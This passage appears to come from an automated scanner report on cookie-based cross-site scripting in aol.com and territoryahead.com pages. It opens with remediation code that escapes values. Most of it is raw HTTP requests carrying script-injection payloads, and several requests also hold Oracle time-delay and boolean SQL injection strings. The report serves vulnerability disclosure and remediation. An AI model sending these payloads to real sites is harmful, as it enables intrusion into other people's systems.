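    replacements stop '</script>' or '<!--' from forming inside the literal
    when it is embedded in an HTML page."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_dlact_script(dlact_cookie: str) -> str:
    """Hardened form of the inline script from 5.134: the cookie value can no
    longer close the literal, so '"-alert(1)-"' stays data."""
    return "<script>var dlact = " + js_string_literal(dlact_cookie) + ";</script>"


def render_diagnostic_comment(headers: dict, debug: bool = False) -> str:
    """Hardened form of the header dump from 5.132: emitted only when a
    debug setting (assumed here) is on, and with every name and value
    comment-encoded so the dump cannot be closed early."""
    if not debug:
        return ""
    lines = [f"{comment_safe(name)}: {comment_safe(value)}"
             for name, value in headers.items()]
    return "<!--\nHeaders:\n" + "\n".join(lines) + "\n-->"


if __name__ == "__main__":
    # Payloads as reported in 5.132 and 5.134.
    print(render_diagnostic_comment(
        {"User-Agent": "Mozilla/5.0 926e9--><script>alert(1)</script>5e35377ec36"},
        debug=True))
    print(render_dlact_script('dl3e131d"-alert(1)-"4408da0b00a'))
```

The \u003c style escapes are what stop a value from closing the enclosing <script> element or opening a comment; quote and backslash escaping alone is enough for an external script resource such as the one in 5.133, but not for a literal inlined into HTML.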

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; tst=%2C2%2Cs391%3A%2C2%2Cs392%3A%2C2%2Cs393%3A%2C2%2Cs394; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; stips5=1; dlact=dl3e131d"-alert(1)-"4408da0b00a; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; s_pers=%20s_getnr%3D1301171833374-Repeat%7C1364243833374%3B%20s_nrgvo%3DRepeat%7C1364243833377%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcommem%253D%252526pid%25253Dacm%25252520%2525253A%25252520main5%25252520AOL.com%252525205.0%25252520Main%252526pidt%25253D1%252526oid%25253Daol-jumpbar1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:40 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmc17.websys.aol.com
Content-Type: text/html;;charset=utf-8
Content-Length: 71380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl3e131d"-alert(1)-"4408da0b00a";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 14;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

5.135. https://www.territoryahead.com/account/login/loginmain%20.jsp [CoreID6 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 97c44--><script>alert(1)</script>24a58cae691 was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209497c44--><script>alert(1)</script>24a58cae691; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=
...[SNIP]...

5.136. https://www.territoryahead.com/account/login/loginmain%20.jsp [PS_ALL cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the PS_ALL cookie is copied into an HTML comment. The payload 1a21a--><script>alert(1)</script>b0d0d16d38e was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
n-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount1a21a--><script>alert(1)</script>b0d0d16d38e; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301505878&v=3&e=1301507678363
UNIQUE_ID: mAN4LawSrSgAAH0dJF4AAABL
SCRIPT_
...[SNIP]...

5.137. https://www.territoryahead.com/account/login/loginmain%20.jsp [customer cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the customer cookie is copied into an HTML comment. The payload 5093e--><script>alert(1)</script>bdfc4321075 was submitted in the customer cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
te,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=926439315093e--><script>alert(1)</script>bdfc4321075; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=1301083737353
UNIQUE_ID: l-MVN6
...[SNIP]...

5.138. https://www.territoryahead.com/account/login/loginmain%20.jsp [mmlID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the mmlID cookie is copied into an HTML comment. The payload 36d2e--><script>alert(1)</script>1deb5b8a81e was submitted in the mmlID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:34:45 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=6840816836d2e--><script>alert(1)</script>1deb5b8a81e; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5
...[SNIP]...

5.139. https://www.territoryahead.com/account/login/loginmain%20.jsp [order cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain%20.jsp

Issue detail

The value of the order cookie is copied into an HTML comment. The payload 52f6b--><script>alert(1)</script>94ebbb28b25 was submitted in the order cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login/loginmain%20.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount

Response

HTTP/1.1 404 Not Found
Date: Wed, 30 Mar 2011 17:25:57 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 36926


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ncoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=6350391452f6b--><script>alert(1)</script>94ebbb28b25; customer=92643931; PS_ALL=%23ps_catid%7Eaccount; JSESSIONID=eDwn-UFCx4o7; s_cc=true; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301081933&v=3&e=1301083737353

...[SNIP]...

5.140. https://www.territoryahead.com/jump.jsp [90232094_clogin cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the 90232094_clogin cookie is copied into an HTML comment. The payload 8af22--><script>alert(1)</script>26113198838 was submitted in the 90232094_clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d10; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:29:35 GMT
Server: Apache
ETag: "AAAAS7uc384"
Last-Modified: Fri, 25 Mar 2011 19:17:50 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 39295


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
8108%29%257c%257cchr%28101%29%257c%257cchr%28109%29%257c%257cchr%28109%29%257c%257cchr%2897%29%29%252c25%29+from+dual%29; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=13010823252448af22--><script>alert(1)</script>26113198838; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: nTUv8KwSrSgAAH2NuQkAAAAl
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https://www.territoryahead.com/jump.jsp
HTTPS: on

Cookies:
mmlID = 68408168

...[SNIP]...

5.141. https://www.territoryahead.com/jump.jsp [CoreID6 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 70ca4--><script>alert(1)</script>974b3a0bf3c was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:25:47 GMT
Server: Apache
ETag: "AAAAS7ucAYc"
Last-Modified: Fri, 25 Mar 2011 19:14:02 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38491


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=9023209470ca4--><script>alert(1)</script>974b3a0bf3c; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_ca
...[SNIP]...

5.142. https://www.territoryahead.com/jump.jsp [JSESSIONID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the JSESSIONID cookie is copied into an HTML comment. The payload c0c2f--><script>alert(1)</script>048dd4a1770 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Note also that the dump reproduces the Cookie header as received, so under normal use the current JSESSIONID value appears in the page body and is readable by any script running in the page whatever flags are set on the cookie; that is a disclosure problem independent of the XSS and is another reason to remove the dump rather than only encode it.

Request

GET /jump.jsp?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:26:23 GMT
Server: Apache
ETag: "AAAAS7ucJRV"
Last-Modified: Fri, 25 Mar 2011 19:14:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=63503913; Path=/; Expires=Fri, 08-Apr-2011 19:14:38 GMT
Set-Cookie: customer=92643931; Path=/; Expires=Sat, 23-Mar-2019 19:14:38 GMT
Set-Cookie: JSESSIONID=aeBRiVzxLAc_; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ge: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=a-e7l_ipIG-ec0c2f--><script>alert(1)</script>048dd4a1770; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; cmRS=t3=1301080538915&pi=ERROR; 90232094_clogin=l=1301080516&v=3&e=1301082340667; PS_ALL=%23ps_catid%7E%28select+dbms_pipe.receive_message%28%28chr%2895%29%2
...[SNIP]...

5.143. https://www.territoryahead.com/jump.jsp [PS_ALL cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the PS_ALL cookie is copied into an HTML comment. The payload 96a8c--><script>alert(1)</script>5d6a7c7b9bc was submitted in the PS_ALL cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=a-e7l_ipIG-e; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082325244

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 25 Mar 2011 19:20:21 GMT
Server: Apache
ETag: "AAAAS7ucy4D"
Last-Modified: Fri, 25 Mar 2011 19:17:29 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 38741


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
tf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503913; customer=92643931; JSESSIONID=auMBUcQMcNOb; cmTPSet=Y; PS_ALL=%23ps_catid%7E-1+or+17-7%253d1096a8c--><script>alert(1)</script>5d6a7c7b9bc; s_cc=true; s_sq=%5B%5BB%5D%5D; 90232094_clogin=l=1301080516&v=3&e=1301082340667; cmRS=t3=1301080538915&pi=ERROR
UNIQUE_ID: fC0vAqwSrRQAAGydCu0AAAAR
SCRIPT_URL: /jump.jsp
SCRIPT_URI: https
...[SNIP]...

5.144. https://www.territoryahead.com/jump.jsp [cmTPSet cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /jump.jsp

Issue detail

The value of the cmTPSet cookie is copied into an HTML comment. The payload c8e35--><script>alert(1)</script>691c4488899 was submitted in the cmTPSet cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

